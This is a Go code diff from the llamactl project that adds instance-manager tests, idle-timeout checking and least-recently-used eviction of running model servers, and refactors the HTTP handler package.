@@ -0,0 +1,229 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

pkg/manager/timeout.go Normal file

@@ -0,0 +1,64 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
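
checkAllTimeouts is presumably invoked from a background goroutine on a TimeoutCheckInterval tick (the interval appears in the configs below, in minutes); a minimal sketch of such a driver, with the channel and function names assumed rather than taken from this diff:

// Hypothetical driver loop; names are illustrative.
func (im *instanceManager) runTimeoutChecker(interval time.Duration, done <-chan struct{}) {
	ticker := time.NewTicker(interval)
	defer ticker.Stop()
	for {
		select {
		case <-ticker.C:
			im.checkAllTimeouts()
		case <-done:
			return
		}
	}
}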
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances with idle timeout disabled (<= 0); they are never evicted
}
if lruInstance == nil || inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict the selected instance by stopping it
_, err := im.StopInstance(lruInstance.Name)
return err
}
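
The eviction path is exercised by the OpenAI proxy change further down: when an on-demand start hits the MaxRunningInstances ceiling and EnableLRUEviction is set, the handler calls EvictLRUInstance before StartInstance, so the least recently used timeout-enabled instance makes room for the requested one.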

pkg/manager/timeout_test.go Normal file

@@ -0,0 +1,328 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually: reset the still-running instances to stopped so shutdown doesn't try to stop real processes
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(mgr manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := mgr.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}
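
SetTimeProvider implies the instance package accepts a clock abstraction; the interface this mock satisfies is presumably just the following (assumed, not shown in this diff):

// Assumed shape of the interface MockTimeProvider implements.
type TimeProvider interface {
	Now() time.Time
}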


@@ -1,501 +0,0 @@
package llamactl_test
import (
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstanceManager(t *testing.T) {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
manager := llamactl.NewInstanceManager(config)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
if instance.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := instance.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, instance := range instances {
names[instance.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// Helper function to create a test manager with standard config
func createTestManager() llamactl.InstanceManager {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
return llamactl.NewInstanceManager(config)
}


@@ -1,10 +1,13 @@
-package llamactl
+package server

 import (
 	"bytes"
 	"encoding/json"
 	"fmt"
 	"io"
+	"llamactl/pkg/config"
+	"llamactl/pkg/instance"
+	"llamactl/pkg/manager"
 	"net/http"
 	"os/exec"
 	"strconv"
@@ -14,26 +17,43 @@ import (
 )

 type Handler struct {
-	InstanceManager InstanceManager
-	config          Config
+	InstanceManager manager.InstanceManager
+	cfg             config.AppConfig
 }

-func NewHandler(im InstanceManager, config Config) *Handler {
+func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
 	return &Handler{
 		InstanceManager: im,
-		config:          config,
+		cfg:             cfg,
 	}
 }

-// HelpHandler godoc
+// VersionHandler godoc
+// @Summary Get llamactl version
+// @Description Returns the version of the llamactl command
+// @Tags version
+// @Security ApiKeyAuth
+// @Produces text/plain
+// @Success 200 {string} string "Version information"
+// @Failure 500 {string} string "Internal Server Error"
+// @Router /version [get]
+func (h *Handler) VersionHandler() http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/plain")
+		fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
+	}
+}
+
+// LlamaServerHelpHandler godoc
 // @Summary Get help for llama server
 // @Description Returns the help text for the llama server command
 // @Tags server
+// @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Help text"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /server/help [get]
-func (h *Handler) HelpHandler() http.HandlerFunc {
+func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		helpCmd := exec.Command("llama-server", "--help")
 		output, err := helpCmd.CombinedOutput()
@@ -46,15 +66,16 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
 	}
 }

-// VersionHandler godoc
+// LlamaServerVersionHandler godoc
 // @Summary Get version of llama server
 // @Description Returns the version of the llama server command
